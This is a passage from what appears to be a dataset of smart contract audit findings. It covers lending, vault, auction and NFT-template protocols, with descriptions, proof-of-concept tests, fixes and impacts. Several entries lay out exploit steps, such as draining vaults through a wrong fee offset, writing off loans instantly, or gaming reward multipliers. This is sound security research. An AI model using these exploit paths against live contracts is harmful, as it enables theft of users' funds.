(epochEnd <= block.timestamp) {\\n return uint256(0);\\n }\\n\\n return epochEnd - block.timestamp; //\\n}\\n```\\n,"Accounting for a future epoch withdrawal causes a number of inconsistencies in the protocol's math, the impact of which vary depending on the situation. As a few examples:\\nIt calls `decreaseEpochLienCount()`. This has the effect of artificially lowering the number of liens in the epoch, which will cause the final liens paid off in the epoch to revert (and will let us process the epoch earlier than intended).\\nIt sets the payee of the lien to the liquidation accountant, which will pay out according to the withdrawal ratio (whereas all funds should be staying in the vault).\\nIt calls `increaseLiquidationsExpectedAtBoundary()`, which can throw off the math when processing the epoch.",```\\nif (PublicVault(owner).timeToEpochEnd() <= COLLATERAL_TOKEN.auctionWindow())\\n```\\n +"_payment() function transfers full paymentAmount, overpaying first liens",medium,"The `_payment()` function sends the full `paymentAmount` argument to the lien owner, which both (a) overpays lien owners if borrowers accidentally overpay and (b) sends the first lien owner all the funds for the entire loop of a borrower is intending to pay back multiple loans.\\nThere are two `makePayment()` functions in LienToken.sol. One that allows the user to specific a `position` (which specific lien they want to pay back, and another that iterates through their liens, paying each back.\\nIn both cases, the functions call out to `_payment()` with a `paymentAmount`, which is sent (in full) to the lien owner.\\n```\\nTRANSFER_PROXY.tokenTransferFrom(WETH, payer, payee, paymentAmount);\\n```\\n\\nThis behavior can cause problems in both cases.\\nThe first case is less severe: If the user is intending to pay off one lien, and they enter a `paymentAmount` greater than the amount owed, the function will send the full `paymentAmount` to the lien owner, rather than just sending the amount owed.\\nThe second case is much more severe: If the user is intending to pay towards all their loans, the `_makePayment()` function loops through open liens and performs the following:\\n```\\nuint256 paymentAmount = totalCapitalAvailable;\\nfor (uint256 i = 0; i < openLiens.length; ++i) {\\n uint256 capitalSpent = _payment(\\n collateralId,\\n uint8(i),\\n paymentAmount,\\n address(msg.sender)\\n );\\n paymentAmount -= capitalSpent;\\n}\\n```\\n\\nThe `_payment()` function is called with the first lien with `paymentAmount` set to the full amount sent to the function. The result is that this full amount is sent to the first lien holder, which could greatly exceed the amount they are owed.","Issue _payment() function transfers full paymentAmount, overpaying first liens\\nIn `_payment()`, if `lien.amount < paymentAmount`, set `paymentAmount = lien.amount`.\\nThe result will be that, in this case, only `lien.amount` is transferred to the lien owner, and this value is also returned from the function to accurately represent the amount that was paid.","A user who is intending to pay off all their loans will end up paying all the funds they offered, but only paying off their first lien, potentially losing a large amount of funds.","```\\nTRANSFER_PROXY.tokenTransferFrom(WETH, payer, payee, paymentAmount);\\n```\\n" +_getInterest() function uses block.timestamp instead of the inputted timestamp,medium,"The `_getInterest()` function takes a timestamp as input. However, in a crucial check in the function, it uses `block.timestamp` instead. The result is that other functions expecting accurate interest amounts will receive incorrect values.\\nThe `_getInterest()` function takes a lien and a timestamp as input. The intention is for it to calculate the amount of time that has passed in the lien (delta_t) and multiply this value by the rate and the amount to get the interest generated by this timestamp.\\nHowever, the function uses the following check regarding the timestamp:\\n```\\nif (block.timestamp >= lien.start + lien.duration) {\\n delta_t = uint256(lien.start + lien.duration - lien.last);\\n} \\n```\\n\\nBecause this check uses `block.timestamp` before returning the maximum interest payment, the function will incorrectly determine which path to take, and return an incorrect interest value.",Change `block.timestamp` to `timestamp` so that the if statement checks correctly.,"There are two negative consequences that can come from this miscalculation:\\nif the function is called when the lien is over (block.timestamp >= lien.start + lien.duration) to check an interest amount from a timestamp during the lien, it will incorrectly return the maximum interest value\\nIf the function is called when the lien is active for a timestamp long after the lien is over, it will skip the check to return maximum value and return the value that would have been generated if interest kept accruing indefinitely (using delta_t = uint256(timestamp.safeCastTo32() - lien.last);)\\nThis `_getInterest()` function is used in many crucial protocol functions (_getOwed(), `calculateSlope()`, `changeInSlope()`, getTotalDebtForCollateralToken()), so these incorrect values can have surprising and unexpected negative impacts on the protocol.",```\\nif (block.timestamp >= lien.start + lien.duration) {\\n delta_t = uint256(lien.start + lien.duration - lien.last);\\n} \\n```\\n +"Vault Fee uses incorrect offset leading to wildly incorrect value, allowing strategists to steal all funds",medium,"`VAULT_FEE()` uses an incorrect offset, returning a number ~1e16X greater than intended, providing strategists with unlimited access to drain all vault funds.\\nWhen using ClonesWithImmutableArgs, offset values are set so that functions representing variables can retrieve the correct values from storage.\\nIn the ERC4626-Cloned.sol implementation, `VAULT_TYPE()` is given an offset of 172. However, the value before it is a `uint8` at the offset 164. Since a `uint8` takes only 1 byte of space, `VAULT_TYPE()` should have an offset of 165.\\nI put together a POC to grab the value of `VAULT_FEE()` in the test setup:\\n```\\nfunction testVaultFeeIncorrectlySet() public {\\n Dummy721 nft = new Dummy721();\\n address tokenContract = address(nft);\\n uint256 tokenId = uint256(1);\\n address publicVault = _createPublicVault({\\n strategist: strategistOne,\\n delegate: strategistTwo,\\n epochLength: 14 days\\n });\\n uint fee = PublicVault(publicVault).VAULT_FEE();\\n console.log(fee)\\n assert(fee == 5000); // 5000 is the value that was meant to be set\\n}\\n```\\n\\nIn this case, the value returned is > 3e20.",Set the offset for `VAULT_FEE()` to 165. I tested this value in the POC I created and it correctly returned the value of 5000.,"This is a highly critical bug. `VAULT_FEE()` is used in `_handleStrategistInterestReward()` to determine the amount of tokens that should be allocated to `strategistUnclaimedShares`.\\n```\\nif (VAULT_FEE() != uint256(0)) {\\n uint256 interestOwing = LIEN_TOKEN().getInterest(lienId);\\n uint256 x = (amount > interestOwing) ? interestOwing : amount;\\n uint256 fee = x.mulDivDown(VAULT_FEE(), 1000); //VAULT_FEE is a basis point\\n strategistUnclaimedShares += convertToShares(fee);\\n }\\n```\\n\\nThe result is that strategistUnclaimedShares will be billions of times higher than the total interest generated, essentially giving strategist access to withdraw all funds from their vaults at any time.","```\\nfunction testVaultFeeIncorrectlySet() public {\\n Dummy721 nft = new Dummy721();\\n address tokenContract = address(nft);\\n uint256 tokenId = uint256(1);\\n address publicVault = _createPublicVault({\\n strategist: strategistOne,\\n delegate: strategistTwo,\\n epochLength: 14 days\\n });\\n uint fee = PublicVault(publicVault).VAULT_FEE();\\n console.log(fee)\\n assert(fee == 5000); // 5000 is the value that was meant to be set\\n}\\n```\\n" +Bids cannot be created within timeBuffer of completion of a max duration auction,medium,"The auction mechanism is intended to watch for bids within `timeBuffer` of the end of the auction, and automatically increase the remaining duration to `timeBuffer` if such a bid comes in.\\nThere is an error in the implementation that causes all bids within `timeBuffer` of the end of a max duration auction to revert, effectively ending the auction early and cutting off bidders who intended to wait until the end.\\nIn the `createBid()` function in AuctionHouse.sol, the function checks if a bid is within the final `timeBuffer` of the auction:\\n```\\nif (firstBidTime + duration - block.timestamp < timeBuffer)\\n```\\n\\nIf so, it sets `newDuration` to equal the amount that will extend the auction to `timeBuffer` from now:\\n```\\nuint64 newDuration = uint256( duration + (block.timestamp + timeBuffer - firstBidTime) ).safeCastTo64();\\n```\\n\\nIf this `newDuration` doesn't extend beyond the `maxDuration`, this works great. However, if it does extend beyond `maxDuration`, the following code is used to update duration:\\n```\\nauctions[tokenId].duration = auctions[tokenId].maxDuration - firstBidTime;\\n```\\n\\nThis code is incorrect. `maxDuration` will be a duration for the contest (currently set to 3 days), whereas `firstTimeBid` is a timestamp for the start of the auction (current timestamps are > 1 billion).\\nSubtracting `firstTimeBid` from `maxDuration` will underflow, which will revert the function.","Change this assignment to simply assign `duration` to `maxDuration`, as follows:\\n```\\nauctions[tokenId].duration = auctions[tokenId].maxDuration\\n```\\n","Bidders who expected to wait until the end of the auction to vote will be cut off from voting, as the auction will revert their bids.\\nVaults whose collateral is up for auction will earn less than they otherwise would have.",```\\nif (firstBidTime + duration - block.timestamp < timeBuffer)\\n```\\n +Loan can be written off by anybody before overdue delay expires,high,"When a borrower takes a second loan after a loan that has been written off, this second loan can be written off instantly by any other member due to missing update of last repay block, leaving the staker at a loss.\\nA staker stakes and vouches a borrower\\nthe borrower borrows calling UToken:borrow: `accountBorrows[borrower].lastRepay` is updated with the current block number\\nthe staker writes off the entire debt of the borrower calling `UserManager:debtWriteOff`. In the internal call to `UToken:debtWriteOff` the principal is set to zero but `accountBorrows[borrower].lastRepay` is not updated\\n90 days pass and a staker vouches for the same borrower\\nthe borrower borrows calling UToken:borrow: `accountBorrows[borrower].lastRepay` is not set to the current block since non zero and stays to the previous value.\\n`accountBorrows[borrower].lastRepay` is now old enough to allow the check in `UserManager:debtWriteOff` at line 738 to pass. The debt is written off by any other member immediatly after the loan is given. The staker looses the staked amount immediatly.\\n```\\n if (block.number <= lastRepay + overdueBlocks + maxOverdueBlocks) {\\n if (staker != msg.sender) revert AuthFailed();\\n }\\n```\\n\\nThe last repay block is still stale and a new loan can be taken and written off immediatly many times as long as stakers are trusting the borrower\\nNote that this can be exploited maliciously by the borrower, who can continously ask for loans and then write them off immediatly.","Issue Loan can be written off by anybody before overdue delay expires\\nReset `lastRepay` for the borrower to 0 when the debt is written off completely\\n```\\n function debtWriteOff(address borrower, uint256 amount) external override whenNotPaused onlyUserManager {\\n uint256 oldPrincipal = getBorrowed(borrower);\\n uint256 repayAmount = amount > oldPrincipal ? oldPrincipal : amount;\\n\\n// Add the line below\\n if (oldPrincipal == repayAmount) accountBorrows[borrower].lastRepay = 0;\\n accountBorrows[borrower].principal = oldPrincipal - repayAmount;\\n totalBorrows -= repayAmount;\\n }\\n```\\n",The staker of the loan looses the staked amount well before the overdue delay is expired,```\\n if (block.number <= lastRepay + overdueBlocks + maxOverdueBlocks) {\\n if (staker != msg.sender) revert AuthFailed();\\n }\\n```\\n +A stake that has just been locked gets full reward multiplier,medium,"A staker gets rewarded with full multiplier even if its stake has just been locked. Multiplier calculation should take into account the duration of the lock.\\nA staker stakes an amount of tokens.\\nThe staker waits for some time\\nThe staker has control of another member (bribe, ...)\\nThe staker vouches this other member\\nThe member borrows\\nThe staker calls `Comptroller:withdrawRewards` and gets an amount of rewards with a multiplier corresponding to a locked stake\\nThe member repays the loan\\nNote that steps 4 to 7 can be made in one tx, so no interest is paid at step 7.\\nThe result is that the staker can always get the full multiplier for rewards, without ever putting any funds at risk, nor any interest being paid. This is done at the expense of other honest stakers, who get proprotionally less of the rewards dripped into the comptroller.\\nFor a coded PoC replace the test `""staker with locked balance gets more rewards""` in `staking.ts` with the following\\n```\\n it(""PoC: staker with locked balance gets more rewards even when just locked"", async () => {\\n const trustAmount = parseUnits(""2000"");\\n const borrowAmount = parseUnits(""1800"");\\n const [account, staker, borrower] = members;\\n\\n const [accountStaked, borrowerStaked, stakerStaked] = await helpers.getStakedAmounts(\\n account,\\n staker,\\n borrower\\n );\\n\\n expect(accountStaked).eq(borrowerStaked);\\n expect(borrowerStaked).eq(stakerStaked);\\n\\n await helpers.updateTrust(staker, borrower, trustAmount);\\n \\n await roll(10);\\n await helpers.borrow(borrower, borrowAmount); // borrows just after withdrawing\\n \\n const [accountMultiplier, stakerMultiplier] = await helpers.getRewardsMultipliers(account, staker);\\n console.log(""accountMultiplier: "", accountMultiplier);\\n console.log(""StakerMultiplier: "", stakerMultiplier);\\n expect(accountMultiplier).lt(stakerMultiplier); // the multiplier is larger even if just locked\\n });\\n```\\n","Issue A stake that has just been locked gets full reward multiplier\\nShould introduce the accounting of the duration of a lock into the rewards calculation, so that full multiplier is given only to a lock that is as old as the stake itself.",A staker can get larger rewards designed for locked stakes by locking and unlocking in the same tx.,"```\\n it(""PoC: staker with locked balance gets more rewards even when just locked"", async () => {\\n const trustAmount = parseUnits(""2000"");\\n const borrowAmount = parseUnits(""1800"");\\n const [account, staker, borrower] = members;\\n\\n const [accountStaked, borrowerStaked, stakerStaked] = await helpers.getStakedAmounts(\\n account,\\n staker,\\n borrower\\n );\\n\\n expect(accountStaked).eq(borrowerStaked);\\n expect(borrowerStaked).eq(stakerStaked);\\n\\n await helpers.updateTrust(staker, borrower, trustAmount);\\n \\n await roll(10);\\n await helpers.borrow(borrower, borrowAmount); // borrows just after withdrawing\\n \\n const [accountMultiplier, stakerMultiplier] = await helpers.getRewardsMultipliers(account, staker);\\n console.log(""accountMultiplier: "", accountMultiplier);\\n console.log(""StakerMultiplier: "", stakerMultiplier);\\n expect(accountMultiplier).lt(stakerMultiplier); // the multiplier is larger even if just locked\\n });\\n```\\n" +updateTrust() vouchers also need check maxVouchers,medium,"maxVouchers is to prevent the “vouchees“ array from getting too big and the loop will have the GAS explosion problem, but “vouchers“have the same problem, if you don't check the vouchers array, it is also possible that vouchers are big and cause updateLocked() to fail\\nvouchees check < maxVouchers ,but vouchers don't check\\n```\\n function updateTrust(address borrower, uint96 trustAmount) external onlyMember(msg.sender) whenNotPaused {\\n// rest of code\\n uint256 voucheesLength = vouchees[staker].length;\\n if (voucheesLength >= maxVouchers) revert MaxVouchees();\\n\\n\\n uint256 voucherIndex = vouchers[borrower].length;\\n voucherIndexes[borrower][staker] = Index(true, uint128(voucherIndex));\\n vouchers[borrower].push(Vouch(staker, trustAmount, 0, 0)); /**** don't check maxVouchers****/\\n```\\n","```\\n function updateTrust(address borrower, uint96 trustAmount) external onlyMember(msg.sender) whenNotPaused {\\n// rest of code\\n uint256 voucheesLength = vouchees[staker].length;\\n if (voucheesLength >= maxVouchers) revert MaxVouchees();\\n\\n\\n uint256 voucherIndex = vouchers[borrower].length;\\n+ if (voucherIndex >= maxVouchers) revert MaxVouchees();\\n voucherIndexes[borrower][staker] = Index(true, uint128(voucherIndex));\\n vouchers[borrower].push(Vouch(staker, trustAmount, 0, 0)); \\n```\\n",it is also possible that vouchers are big and cause updateLocked() to fail,"```\\n function updateTrust(address borrower, uint96 trustAmount) external onlyMember(msg.sender) whenNotPaused {\\n// rest of code\\n uint256 voucheesLength = vouchees[staker].length;\\n if (voucheesLength >= maxVouchers) revert MaxVouchees();\\n\\n\\n uint256 voucherIndex = vouchers[borrower].length;\\n voucherIndexes[borrower][staker] = Index(true, uint128(voucherIndex));\\n vouchers[borrower].push(Vouch(staker, trustAmount, 0, 0)); /**** don't check maxVouchers****/\\n```\\n" +Unsafe downcasting arithmetic operation in UserManager related contract and in UToken.sol,medium,"The value is unsafely downcasted and truncated from uint256 to uint96 or uint128 in UserManager related contract and in UToken.sol.\\nvalue can unsafely downcasted. let us look at it cast by cast.\\nIn UserManagerDAI.sol\\n```\\n function stakeWithPermit(\\n uint256 amount,\\n uint256 nonce,\\n uint256 expiry,\\n uint8 v,\\n bytes32 r,\\n bytes32 s\\n ) external whenNotPaused {\\n IDai erc20Token = IDai(stakingToken);\\n erc20Token.permit(msg.sender, address(this), nonce, expiry, true, v, r, s);\\n\\n stake(uint96(amount));\\n }\\n```\\n\\nas we can see, the user's staking amount is downcasted from uint256 to uint96.\\nthe same issue exists in UserManagerERC20.sol\\nIn the context of UToken.sol, a bigger issue comes.\\nUser invokes the borrow function in UToken.sol\\n```\\n function borrow(address to, uint256 amount) external override onlyMember(msg.sender) whenNotPaused nonReentrant {\\n```\\n\\nand\\n```\\n // Withdraw the borrowed amount of tokens from the assetManager and send them to the borrower\\n if (!assetManagerContract.withdraw(underlying, to, amount)) revert WithdrawFailed();\\n\\n // Call update locked on the userManager to lock this borrowers stakers. This function\\n // will revert if the account does not have enough vouchers to cover the borrow amount. ie\\n // the borrower is trying to borrow more than is able to be underwritten\\n IUserManager(userManager).updateLocked(msg.sender, uint96(amount + fee), true);\\n```\\n\\nnote when we withdraw fund from asset Manager, we use a uint256 amount, but we downcast it to uint96(amount + fee) when updating the locked. The accounting would be so broken if the amount + fee is a larger than uint96 number.\\nSame issue in the function UToken.sol# _repayBorrowFresh\\n```\\n function _repayBorrowFresh(\\n address payer,\\n address borrower,\\n uint256 amount\\n ) internal {\\n```\\n\\nand\\n```\\n // Update the account borrows to reflect the repayment\\n accountBorrows[borrower].principal = borrowedAmount - repayAmount;\\n accountBorrows[borrower].interest = 0;\\n```\\n\\nand\\n```\\n IUserManager(userManager).updateLocked(borrower, uint96(repayAmount - interest), false);\\n```\\n\\nwe use a uint256 number for borrowedAmount - repayAmount, but downcast it to uint96(repayAmount - interest) when updating the lock!\\nNote there are index-related downcasting, the damage is small , comparing the accounting related downcasting.because it is difference to have uint128 amount of vouch, but I still want to mention it: the index is unsafely downcasted from uint256 to uint128\\n```\\n // Get the new index that this vouch is going to be inserted at\\n // Then update the voucher indexes for this borrower as well as\\n // Adding the Vouch the the vouchers array for this staker\\n uint256 voucherIndex = vouchers[borrower].length;\\n voucherIndexes[borrower][staker] = Index(true, uint128(voucherIndex));\\n vouchers[borrower].push(Vouch(staker, trustAmount, 0, 0));\\n\\n // Add the voucherIndex of this new vouch to the vouchees array for this\\n // staker then update the voucheeIndexes with the voucheeIndex\\n uint256 voucheeIndex = voucheesLength;\\n vouchees[staker].push(Vouchee(borrower, uint96(voucherIndex)));\\n voucheeIndexes[borrower][staker] = Index(true, uint128(voucheeIndex));\\n```\\n\\nThere are block.number related downcasting, which is a smaller issue.\\n```\\nvouch.lastUpdated = uint64(block.number);\\n```\\n","Just use uint256, or use openzepplin safeCasting.",The damage level from the number truncation is rated by:\\nUToken borrow and repaying downcasting > staking amount downcating truncation > the vouch index related downcasting. > block.number casting.,"```\\n function stakeWithPermit(\\n uint256 amount,\\n uint256 nonce,\\n uint256 expiry,\\n uint8 v,\\n bytes32 r,\\n bytes32 s\\n ) external whenNotPaused {\\n IDai erc20Token = IDai(stakingToken);\\n erc20Token.permit(msg.sender, address(this), nonce, expiry, true, v, r, s);\\n\\n stake(uint96(amount));\\n }\\n```\\n" +getUserInfo() returns incorrect values for locked and stakedAmount,medium,"The `getUserInfo()` function mixes up the values for `locked` and `stakedAmount`, so the value for each of these is returned for the other.\\nIn UnionLens.sol, the `getUserInfo()` function is used to retrieve information about a given user.\\nIn order to pull the user's staking information, the following function is called:\\n```\\n(bool isMember, uint96 locked, uint96 stakedAmount) = userManager.stakers(user);\\n```\\n\\nThis function is intended to return these three values from the UserManager.sol contract. However, in that contract, the function being called returns a Staker struct, which has the following values:\\n```\\nstruct Staker {\\n bool isMember;\\n uint96 stakedAmount;\\n uint96 locked;\\n}\\n```\\n\\nBecause both `locked` and `stakedAmount` have the type `uint96`, the function does not revert, and simply returns the incorrect values to the caller.","Reverse the order of return values in the `getUserInfo()` function, so that it reads:\\n```\\n(bool isMember, uint96 stakedAmount, uint96 locked) = userManager.stakers(user);\\n```\\n","Any user or front end calling the `getUserInfo()` function will be given incorrect values, which could lead to wrong decisions.","```\\n(bool isMember, uint96 locked, uint96 stakedAmount) = userManager.stakers(user);\\n```\\n" +`AssetManager.rebalance()` will revert when the balance of `tokenAddress` in the money market is 0.,medium,"`AssetManager.rebalance()` will revert when the balance of `tokenAddress` in the money market is 0.\\nAssetManager.rebalance() tries to withdraw tokens from each money market for rebalancing here.\\n```\\n // Loop through each money market and withdraw all the tokens\\n for (uint256 i = 0; i < moneyMarketsLength; i++) {\\n IMoneyMarketAdapter moneyMarket = moneyMarkets[i];\\n if (!moneyMarket.supportsToken(tokenAddress)) continue;\\n moneyMarket.withdrawAll(tokenAddress, address(this));\\n\\n supportedMoneyMarkets[supportedMoneyMarketsSize] = moneyMarket;\\n supportedMoneyMarketsSize++;\\n }\\n```\\n\\nWhen the balance of the `tokenAddress` is 0, we don't need to call `moneyMarket.withdrawAll()` but it still tries to call.\\nBut this will revert because Aave V3 doesn't allow to withdraw 0 amount here.\\n```\\n function validateWithdraw(\\n DataTypes.ReserveCache memory reserveCache,\\n uint256 amount,\\n uint256 userBalance\\n ) internal pure {\\n require(amount != 0, Errors.INVALID_AMOUNT);\\n```\\n\\nSo `AssetManager.rebalance()` will revert if one money market has zero balance of `tokenAddress`.","Issue `AssetManager.rebalance()` will revert when the balance of `tokenAddress` in the money market is 0.\\nI think we can modify AaveV3Adapter.withdrawAll() to work only when the balance is positive.\\n```\\n function withdrawAll(address tokenAddress, address recipient)\\n external\\n override\\n onlyAssetManager\\n checkTokenSupported(tokenAddress)\\n {\\n address aTokenAddress = tokenToAToken[tokenAddress];\\n IERC20Upgradeable aToken = IERC20Upgradeable(aTokenAddress);\\n uint256 balance = aToken.balanceOf(address(this));\\n\\n if (balance > 0) {\\n lendingPool.withdraw(tokenAddress, type(uint256).max, recipient);\\n }\\n }\\n```\\n",The money markets can't be rebalanced if there is no balance in at least one market.,"```\\n // Loop through each money market and withdraw all the tokens\\n for (uint256 i = 0; i < moneyMarketsLength; i++) {\\n IMoneyMarketAdapter moneyMarket = moneyMarkets[i];\\n if (!moneyMarket.supportsToken(tokenAddress)) continue;\\n moneyMarket.withdrawAll(tokenAddress, address(this));\\n\\n supportedMoneyMarkets[supportedMoneyMarketsSize] = moneyMarket;\\n supportedMoneyMarketsSize++;\\n }\\n```\\n" +gas limit DoS via unbounded operations,medium,"Only one attack will lead to two types of vulnerabilities in `UserManager.sol` and `UToken.sol`\\nOn `UserManager.sol` ==> `updateTrust()` Case one: malicious users (members) can keep `vouching` Alice with `trustAmount == 0` until his `vouchers` array achieves the max limit (2**256-1) So when a normal member tries to give `vouching` to Alice with `trustAmount != 0` he will find because the `vouchers` array completely full.\\nCase two (which is more realistic ): malicious users (members) can keep `vouching` Alice with `trustAmount == 0` until his `vouchers` array achieves late's say 20% of max limit (2**256-1) The problem is when Alice invoke `borrow()` or `repayBorrow()` on `UToken.sol`\\n```\\n IUserManager(userManager).updateLocked(msg.sender, uint96(amount + fee), true);\\n …\\n IUserManager(userManager).updateLocked(borrower, uint96(repayAmount - interest), false);\\n```\\n\\nIt will call `updateLocked()` on `UserManager.sol`\\n```\\n function updateLocked(\\n address borrower,\\n uint96 amount,\\n bool lock\\n ) external onlyMarket {\\n uint96 remaining = amount;\\n\\n for (uint256 i = 0; i < vouchers[borrower].length; i++) {\\n \\n```\\n\\nThe for loop could go through `vouchers[]` which could be long enough to lead to a ""gas limit DoS via unbounded operations"" And the same thing with `registerMember()`, any user could lose all their fund in this transaction\\n```\\n function registerMember(address newMember) public virtual whenNotPaused {\\n if (stakers[newMember].isMember) revert NoExistingMember();\\n\\n uint256 count = 0;\\n uint256 vouchersLength = vouchers[newMember].length;\\n\\n // Loop through all the vouchers to count how many active vouches there\\n // are that are greater than 0. Vouch is the min of stake and trust\\n for (uint256 i = 0; i < vouchersLength; i++) {\\n```\\n",Add check for `trustAmount == 0`,1- The user couldn't get any more `vouching` 2- The user will be not able to `borrow()` or `repayBorrow()` 3- No one can in invokeregisterMember() successfully for a specific user,"```\\n IUserManager(userManager).updateLocked(msg.sender, uint96(amount + fee), true);\\n …\\n IUserManager(userManager).updateLocked(borrower, uint96(repayAmount - interest), false);\\n```\\n" +Template implementations doesn't validate configurations properly,medium,"In past audits, we have seen contract admins claim that invalidated configuration setters are fine since “admins are trustworthy”. However, cases such as Nomad got drained for over $150M and Misconfiguration in the Acala stablecoin project allows attacker to steal 1.2 billion aUSD have shown again and again that even trustable entities can make mistakes. Thus any fields that might potentially result in insolvency of protocol should be thoroughly checked.\\nNftPort template implementations often ignore checks for config fields. For the rest of the issue, we take `royalty` related fields as an example to illustrate potential consequences of misconfigurations. Notably, lack of check is not limited to `royalty`, but exists among most config fields.\\nAdmins are allowed to set a wrong `royaltiesBps` which is higher than `ROYALTIES_BASIS`. `royaltyInfo()` will accept this invalid `royaltiesBps` and users will pay a large amount of royalty.\\nEIP-2981 (NFT Royalty Standard) defines `royaltyInfo()` function that specifies how much to pay for a given sale price. In general, royalty should not be higher than 100%. NFTCollection.sol checks that admins can't set royalties to more than 100%:\\n```\\n /// Validate a runtime configuration change\\n function _validateRuntimeConfig(RuntimeConfig calldata config)\\n internal\\n view\\n {\\n // Can't set royalties to more than 100%\\n require(config.royaltiesBps <= ROYALTIES_BASIS, ""Royalties too high"");\\n\\n // rest of code\\n```\\n\\nBut `NFTCollection` only check `royaltiesBps` when admins call `updateConfig()`, it doesn't check `royaltiesBps` in `initialize()` function, leading to admins could set an invalid `royaltiesBps` (higher than 100%) when initializing contracts.\\nThe same problem exists in ERC721NFTProduct and ERC1155NFTProduct. Both ERC721NFTProduct and ERC1155NFTProduct don't check `royaltiesBasisPoints` in `initialize()` function. Furthermore, these contracts also don't check `royaltiesBasisPoints` when admins call `update()` function. It means that admins could set an invalid `royaltiesBasisPoints` which may be higher than 100% in any time.",Issue Template implementations doesn't validate configurations properly\\nCheck `royaltiesBps <= ROYALTIES_BASIS` both in `initialize()` and `update()` functions.,"EIP-2981 only defines `royaltyInfo()` that it should return royalty amount rather than royalty percentage. It means that if the contract has an invalid royalty percentage which is higher than 100%, `royaltyInfo()` doesn't revert and users will pay a large amount of royalty.","```\\n /// Validate a runtime configuration change\\n function _validateRuntimeConfig(RuntimeConfig calldata config)\\n internal\\n view\\n {\\n // Can't set royalties to more than 100%\\n require(config.royaltiesBps <= ROYALTIES_BASIS, ""Royalties too high"");\\n\\n // rest of code\\n```\\n" +Freezing roles in ERC721NFTProduct and ERC1155NFTProduct is moot,medium,"In ERC721NFTProduct and ERC1155NFTProduct roles can be frozen which is supposed to lock role to current addresses and not allow any changes. The problem is that admin can still use AccessControlUpgradable#grantRole and revokeRole to grant and remove roles to addresses because hasRole allows ""ADMIN_ROLE"" to bypass all role restrictions even ""DEFAULT_ADMIN_ROLE"".\\n```\\nfunction hasRole(bytes32 role, address account)\\n public\\n view\\n virtual\\n override\\n returns (bool)\\n{\\n return\\n super.hasRole(ADMIN_ROLE, account) || super.hasRole(role, account);\\n}\\n```\\n\\nIn GranularRoles.sol and AccessControlUpgradable.sol, developers are careful to never grant the ""DEFAULT_ADMIN_ROLE"" to any user. Additionally they never set the admin role of any role so that it's admin will remain ""DEFAULT_ADMIN_ROLE"". In theory this should make so that there is no way to grant or revoke roles outside of GranularRoles#_initRoles and updateRoles. The issue is that the override by GranularRoles#hasRole allows ""ADMIN_ROLE"" to bypass any role restriction including ""DEFAULT_ADMIN_ROLE"". This allows ""ADMIN_ROLE"" to directly call AccessControlUpgradable#grantRole and revokeRole, which makes the entire freezing system useless as it doesn't actually stop any role modification.","Override AccessControlUpgradable#grantRole and revokeRole in GranularRoles.sol to revert when called:\\n```\\n GranularRoles.sol\\n\\n+ function grantRole(bytes32 role, address account) public virtual override {\\n+ revert();\\n+ }\\n\\n+ function revokeRole(bytes32 role, address account) public virtual override {\\n+ revert();\\n+ }\\n```\\n","Freezing roles doesn't actually prevent ""ADMIN_ROLE"" from modifying roles as intended. Submitting as high due to gross over-extension of admin authority clearly violating intended guardrails.","```\\nfunction hasRole(bytes32 role, address account)\\n public\\n view\\n virtual\\n override\\n returns (bool)\\n{\\n return\\n super.hasRole(ADMIN_ROLE, account) || super.hasRole(role, account);\\n}\\n```\\n" +registerTemplate() can't handle properly when ITemplate version is 0,medium,"Factory.sol when register one template , and template ' s version is 0, the latestImplementation[templateName] will be address(0) and add other version, ""_templateNames"" will duplicate\\nWhen version is equal 0 latestImplementation[templateName] don't set\\n```\\n function _setTemplate(\\n string memory templateName,\\n uint256 templateVersion,\\n address implementationAddress\\n ) internal {\\n// rest of code\\n\\n if (latestImplementation[templateName] == address(0)) { /****add other version, _templateNames will duplicate ****/\\n _templateNames.push(templateName);\\n }\\n\\n if (templateVersion > latestVersion[templateName]) {\\n latestVersion[templateName] = templateVersion;\\n latestImplementation[templateName] = implementationAddress; /****templateVersion==0 , don't set ****/\\n }\\n\\n }\\n```\\n","```\\n function _setTemplate(\\n string memory templateName,\\n uint256 templateVersion,\\n address implementationAddress\\n ) internal {\\n\\n - if (templateVersion > latestVersion[templateName]) {\\n + if (templateVersion > = latestVersion[templateName]) {\\n latestVersion[templateName] = templateVersion;\\n latestImplementation[templateName] = implementationAddress; \\n }\\n```\\n","latestImplementation[templateName] and _templateNames will error. external contracts may think there is no setup, resulting in duplicate setups that keep failing","```\\n function _setTemplate(\\n string memory templateName,\\n uint256 templateVersion,\\n address implementationAddress\\n ) internal {\\n// rest of code\\n\\n if (latestImplementation[templateName] == address(0)) { /****add other version, _templateNames will duplicate ****/\\n _templateNames.push(templateName);\\n }\\n\\n if (templateVersion > latestVersion[templateName]) {\\n latestVersion[templateName] = templateVersion;\\n latestImplementation[templateName] = implementationAddress; /****templateVersion==0 , don't set ****/\\n }\\n\\n }\\n```\\n" +Factory uses signature that do not have expiration,medium,"NftPort can't remove license from user, once the signature was provided to it, without changing `SIGNER_ROLE` address.\\nIn Factory contract there are few methods that are called when signed by trusted signer.\\nThis is how the signature is checked\\n```\\nsignedOnly(abi.encodePacked(msg.sender, instance, data), signature)\\n```\\n\\nAs you can see there is no any expiration time. That means that once, the signer has signed the signature for the user it can use it for the end of life. It's like lifetime license. The only option to remove the license from user is to revoke `SIGNER_ROLE` and set it to another account. But it's possible that the NFTPort will have a need to do that with current signer.",Add expiration param to the signature.,License can't be removed.,"```\\nsignedOnly(abi.encodePacked(msg.sender, instance, data), signature)\\n```\\n" +Underflow in ```_previewWithdraw``` could prevent withdrawals,high,"An underflow in the `_previewWithdraw` function in `AuctionInternal.sol` due to totalContractsSold exceeding auction.totalContracts could prevent users from withdrawing options.\\nThe `_previewWithdraw` function returns the fill and refund amounts for a buyer by looping over all orders. A totalContractsSold variable is used to track the amount of contracts sold as the loop iterates over all orders. If the current order's size + totalContractsSold exceeds the auction's totalContracts then the order will only be filled partially. The calculation for the partial fill (remainder) is given on line 318. This will lead to an underflow if totalContractsSold > the auction's totalContracts which would happen if there are multiple orders that cause the totalContractsSold variable to exceed totalContracts.\\nThe totalContractsSold variable in `_previewWithdraw` could exceed the auction.totalContracts due to the contracts sold before the start of an auction through limit orders not being limited. When an order is added, `_finalizeAuction` is only called if the auction has started. The `_finalizeAuction` function will call the `_processOrders` function which will return true if the auction has reached 100% utilization. Since limit orders can be made before the start of an auction, `_finalizeAuction` is not called and any amount of new orders may be made.\\nExample: The buyer makes a limit order with size > auction.totalContracts. They then make another order with size of anything. These orders are made before the start of the auction so `_processOrders` is not called for every new order and totalContractsSold can exceed totalContracts. When `_previewWithdraw` is called, after the buyer's 